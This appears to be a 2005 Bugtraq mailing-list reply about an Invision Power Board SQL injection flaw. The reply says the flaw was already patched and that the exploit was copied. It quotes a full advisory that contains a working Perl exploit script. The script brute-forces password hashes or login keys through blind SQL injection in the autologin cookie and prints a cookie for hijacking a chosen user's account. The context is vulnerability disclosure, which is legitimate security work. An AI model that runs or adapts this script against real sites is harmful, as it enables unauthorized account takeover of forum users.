Re: [HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch

From: GulfTech Security Research (security_at_gulftech.org)
Date: 07/17/05

  • Next message: James Longstreet: "Re: On classifying attacks"
    Date: Sun, 17 Jul 2005 11:24:29 -0500
    To: bugtraq@securityfocus.com
    
    

    Hello,

    I am writing to clear up any confusion here for both the end users and
    the readers.

    1) This vulnerability was discovered by me (James Bercegay), reported,
    and fixed several months ago.
    2) If you have applied the necessary Invision Power Board updates as
    outlined here
         http://forums.invisionpower.com/index.php?showtopic=168016
         Then you are 100% immune to this "exploit" :) Indeed this only
    affects 2.0.3 and earlier.
    3) I believe this is the link to the real BID for this issue
        http://www.securityfocus.com/bid/13529

    I have no idea how the confusion came about in regards to this issue,
    but hopefully this clears up any questions the Invision Power Board
    users reading this post may have.

    Regards,

    James

    P.S. Yes, it does seem agustus00 was right when he said the exploit code
    was copied.
            
    http://downloads.securityfocus.com/vulnerabilities/exploits/invision_sql_poc.pl

    zinho@hackerscenter.com wrote:

    >Hackers Center Security Group (http://www.hackerscenter.com/)
    >Zinho's Security Advisory
    >
    >Desc: Invision PowerBoard 1.3.x - 2.x Privilege escalation through SQL injection
    >Risk: High
    >
    >
    >hacky0u from http://www.h4cky0u.org kindly reported to me an exploit working against 1.3.x and 2.x versions of Invision Power board.
    >
    >I've coded a quickfix to patch it:
    >http://www.hackerscenter.com/archive/view.asp?id=3812
    >
    >
    >
    >This is the exploit (Full credit to h4cky0u for it):
    >#!/usr/bin/perl -w
    >
    >##################################################################
    ># This one actually works :) Just paste the outputted cookie into
    ># your request header using livehttpheaders or something and you
    ># will probably be logged in as that user. No need to decrypt it!
    ># Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org
    >##################################################################
    >
    >use LWP::UserAgent;
    >
    >$ua = new LWP::UserAgent;
    >$ua->agent("Mosiac 1.0" . $ua->agent);
    >
    >if (!$ARGV[0]) {$ARGV[0] = '';}
    >if (!$ARGV[3]) {$ARGV[3] = '';}
    >
    >my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
    >my $user = $ARGV[1]; # userid to jack
    >my $iver = $ARGV[2]; # version 1 or 2
    >my $cpre = $ARGV[3]; # cookie prefix
    >my $dbug = $ARGV[4]; # debug?
    >
    >if (!$ARGV[2])
    >{
    >print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2]. ";
    >exit;
    >}
    >
    >my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
    >
    >my $outputs = '';
    >
    >for( $i=1; $i < 33; $i++ )
    >{
    >for( $j=0; $j < 16; $j++ )
    >{
    >my $current = $charset[$j];
    >my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
    >"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
    >my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
    >my $res = $ua->get($path, @cookie);
    >
    ># If we get a valid sql request then this
    ># does not appear anywhere in the sources
    >$pattern = '<title>(.*)Log In(.*)</title>';
    >
    >$_ = $res->content;
    >
    >if ($dbug) { print };
    >
    >if ( !(/$pattern/) )
    >{
    >$outputs .= $current;
    >print "$current ";
    >last;
    >}
    >
    >}
    >if ( length($outputs) < 1 ) { print "Not Exploitable! "; exit; }
    >}
    >print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
    >exit;
    >
    ># www.h4cky0u.org
    >
    >
    >


  • Next message: James Longstreet: "Re: On classifying attacks"

    Relevant Pages

    • Re: Userform Image Control and embedded images
      ... concisely without being too concise, ... I was not aware that you could load the image from a file, save the XL file, ... Regards, ... I guess the confusion for me is from your basic question. ...
      (microsoft.public.excel.programming)
    • Re: On the observation of a moving object.
      ... >> There seems to be some sort of confusion. ... > reference to a third body, and that by considering another body you'll ... I suppose it had to end up with a train story. ... Very confused regards, Ken ...
      (sci.physics.relativity)
    • Re: FTTC - confused !
      ... David's original post including headers: ... BT are set up to cause confusion. ... My exchange is 21CN and I just used the checker says I will get 6 Mb, ... As regards the list of exchanges getting fiber mine is not on. ...
      (uk.telecom.broadband)
    • Re: C# should generalize the property and indexers to property index
      ... it is similiar as normal property definition. ... Sorry for any confusion. ... Best regards, ...
      (microsoft.public.dotnet.languages.csharp)